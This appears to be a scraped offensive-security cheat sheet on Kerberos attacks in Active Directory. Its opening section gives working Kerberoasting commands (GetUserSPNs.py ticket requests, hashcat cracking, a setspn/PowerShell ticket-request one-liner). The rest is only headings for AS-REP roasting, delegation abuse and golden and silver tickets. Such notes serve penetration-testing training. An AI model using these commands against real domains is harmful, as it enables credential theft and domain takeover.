Kerberos Attacks
From Linux
GetUserSPN
# Request 1 Ticket
GetUsersSPNs.py -dc-ip <ip> <domain/<user> -request-user <username>
# Request All Tickets
GetUsersSPNs.py -dc-ip <ip> <domain/<user --request
# Save to Output
GetUserSPNs.py -dc-ip <ip> INLANEFREIGHT.LOCAL/forend -request-user sqldev -outputfile sqldev_tgs
# Crack TGS Ticket
hashcat -m 13100 file.tgs $ROCKYOUFrom Windows
setspn.exe
# Find Accounts with SPN
setspn.exe -Q */*
# Better Command
setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }Mimikatz
PowerView
Rubeus
Double Hop Workarounds
Method 1: PSCredential Object
Method 2: Register PSSession Configuration
Roasting Attacks
AS-REPRoasting (Windows)
AS-REP Roasting Enumeration
Performing AS-REPRoasting
Set DONT_REQ_PREAUTH (PowerView)
AS-REPRoasting (LInux)
AS-REPRoasting Users Enumeration
Find Accounts Without Authentication
Kerberoasting (Windows)
Manual Detection (PowerShell Script)
Find Accounts with SPN (PowerView)
Invoke Kerberoasting (PowerView)
Rubeus Kerberoasting
Kerberoasting Without Account Password
Kerberoasting (Linux)
Unconstrained Delegation
Unconstrained Delegation - Computer
Method 1 (Waiting Authentication)
Method 2 (Printer Bug)
3 Captare & Renew Ticket
4 DcSync
5 Using NT Hash
Unconstrained Delegation - Users
Gather Unconstrained Delegation Users (Powerview)
1 Create Fake DNS Record
2 Verify DNS
3 Craft SPN
4 Decrypt Ticket
5 Leveraging Printer Bug
6 Perform Attack
7 Export ccache + Secrets Dump
Constrained Delegation
Constrained Delegation (Windows)
Gather Constrained Delegation Computers
1 Get Machine Hash (Mimikatz)
2 Constrained Delegation Attack
Constrained Delegation (Linux)
1 Find Delegation Accounts
2 Craft Valid TGS Ticket
3 Login With TGS Ticket
Resource Based Delegation (Windows)
Enumerate RBCD Script
1 Create Fake Computer
2 Modify Attributes Created Computer
3 Get Computer Hash
4 Request TGS Ticket
Resource Based Delegation (Linux)
1 Create a New Computer
2 Add Computer to Trusted List
3 Request TGS Ticket
4 Export ccache & Login
Ticket Abuse
Golden Ticket (Windows)
1 Gather Domain Name
2 Gather Domain SID
3 Gather krbtgt Hash
4 Forge Golden Ticket
5 Login
Golden Ticket (Linux)
1 Gather Domain (SID)
2 Create Golden Ticket
3 Importing and Use Ticket
Silver Ticket (Windows)
1 Gather Domain SID
2 Compromised Service Account
3 Forge Silver Ticket
Create Sacrificial Process
Silver Ticket (Linux)
1 Retrieve Domain SID
2 Create Silver Ticket
3 Export ccache
Pass The Ticket
1 Create Sacrificial Process
2 Read Tickets
3 Extract Ticket With Rubeus
4 Renew Ticket
4 Read Files
Last updated